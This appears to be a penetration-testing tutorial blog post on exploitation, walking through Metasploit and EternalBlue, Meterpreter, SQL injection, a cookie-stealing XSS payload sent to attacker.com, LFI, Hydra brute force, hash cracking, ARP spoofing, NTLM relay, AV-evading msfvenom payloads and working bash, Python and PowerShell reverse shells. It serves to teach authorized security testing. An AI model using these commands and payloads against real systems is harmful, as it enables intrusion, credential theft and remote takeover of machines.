Exploitation: Turning Vulnerabilities into Access (Part 4)

Share:

The Moment of Truth

exploitation metasploit shells payloads web-attacks

The Moment of Truth

You’ve gathered intelligence. You’ve mapped the attack surface. You’ve identified vulnerabilities. Now comes the phase everyone imagines when they think of “hacking”—Exploitation.

Exploitation is the process of leveraging a vulnerability to achieve unauthorized access. But let me be clear: exploitation in professional pentesting is surgical and documented. We’re not causing damage—we’re proving risk.

---

Understanding Exploits

An exploit is code that takes advantage of a vulnerability. Vulnerabilities come in many forms:

• Software Bugs: Buffer overflows, use-after-free, race conditions.
• Misconfigurations: Default credentials, open shares, debug modes.
• Logic Flaws: Authentication bypasses, IDOR, privilege escalation.
• Known CVEs: Published vulnerabilities with public exploits.

The Exploit Lifecycle

1. Vulnerability Discovery: Identified in recon phase.
2. Exploit Selection: Find or create exploit code.
3. Payload Selection: What do we want to achieve? (Shell, data, persistence)
4. Execution: Deliver and trigger the exploit.
5. Access: Gain foothold on the system.

---

Metasploit Framework

Metasploit is the world’s most popular penetration testing framework. It contains thousands of exploits, payloads, and auxiliary modules.

Architecture

┌─────────────────┐
│    Exploits     │  Code that triggers vulnerabilities
├─────────────────┤
│    Payloads     │  Code that runs after exploitation
├─────────────────┤
│   Auxiliary     │  Scanners, fuzzers, helpers
├─────────────────┤
│     Post        │  Post-exploitation modules
├─────────────────┤
│    Encoders     │  Obfuscate payloads to avoid AV
└─────────────────┘

Basic Workflow

# Start Metasploit
msfconsole

# Search for exploits
search type:exploit name:eternalblue

# Select an exploit
use exploit/windows/smb/ms17_010_eternalblue

# View options
show options

# Set target
set RHOSTS 192.168.1.100

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

# Execute
exploit

Meterpreter

Meterpreter is Metasploit’s advanced payload—an in-memory, extensible shell.

# Inside Meterpreter session
meterpreter > sysinfo           # System information
meterpreter > getuid            # Current user
meterpreter > ps                # List processes
meterpreter > hashdump          # Dump password hashes
meterpreter > upload file.exe   # Upload files
meterpreter > download file.txt # Download files
meterpreter > shell             # Drop to system shell
meterpreter > getsystem         # Attempt privilege escalation

---

Web Application Attacks

Web apps are the most common entry point. Let’s cover the big ones.

SQL Injection

When user input is inserted directly into SQL queries.

# Original URL
http://target.com/user?id=1

# Test for SQLi
http://target.com/user?id=1'
http://target.com/user?id=1 OR 1=1--

# Automated exploitation
sqlmap -u "http://target.com/user?id=1" --dbs --dump

Defense: Parameterized queries, input validation.

Cross-Site Scripting (XSS)

Injecting JavaScript that executes in victims’ browsers.

<!-- Stored XSS -->
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

<!-- Reflected XSS -->
http://target.com/search?q=<script>alert('XSS')</script>

Defense: Output encoding, Content Security Policy.

Command Injection

When user input is passed to system commands.

# Vulnerable code
os.system("ping " + user_input)

# Attack
user_input = "127.0.0.1; cat /etc/passwd"

Defense: Never pass user input to shells. Use safe APIs.

Local File Inclusion (LFI)

# Normal request
http://target.com/page?file=about.php

# LFI attack
http://target.com/page?file=../../../etc/passwd
http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php

Insecure Direct Object Reference (IDOR)

# Your profile
http://target.com/api/user/1001

# Someone else's profile (unauthorized)
http://target.com/api/user/1002

---

Password Attacks

Sometimes the simplest path is through the front door.

Brute Force

# Hydra for SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Hydra for web login
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

Password Spraying

Instead of many passwords against one user, try one password against many users.

crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Summer2026!'

Hash Cracking

# Hashcat with wordlist
hashcat -m 1000 hashes.txt rockyou.txt

# With rules
hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule

---

Network Attacks

Man-in-the-Middle (ARP Spoofing)

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP spoof
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# Capture traffic
wireshark

LLMNR/NBT-NS Poisoning

# Responder captures NTLMv2 hashes
responder -I eth0 -wrf

SMB Relay

# Relay captured authentication
ntlmrelayx.py -tf targets.txt -smb2support

---

Creating Payloads

Sometimes pre-built exploits aren’t enough. We craft custom payloads.

Msfvenom

# Windows reverse shell executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf > shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > shell.php

# Encoded to evade AV
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe

Simple Reverse Shells

# Bash
bash -i >& /dev/tcp/192.168.1.50/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.168.1.50",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.50',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}"

---

Avoiding Rabbit Holes

Not every vulnerability leads to exploitation:

1. False Positives: Scanners lie. Verify manually.
2. Patched Systems: CVE exists but system is updated.
3. Mitigating Controls: WAF, IPS blocking exploits.
4. Scope Limitations: Vulnerability exists but exploitation not authorized.

Know when to move on. Document unexploited findings for the report.

---

Documentation During Exploitation

For every successful exploit, document:

1. Target: IP, hostname, service.
2. Vulnerability: CVE or description.
3. Exploit Used: Module, script, or manual steps.
4. Payload: What was delivered.
5. Evidence: Screenshots, command output.
6. Impact: What access was achieved.

Next Part: We’ve gained access. Now what? Post-Exploitation—privilege escalation, lateral movement, persistence, and data exfiltration.

Discussion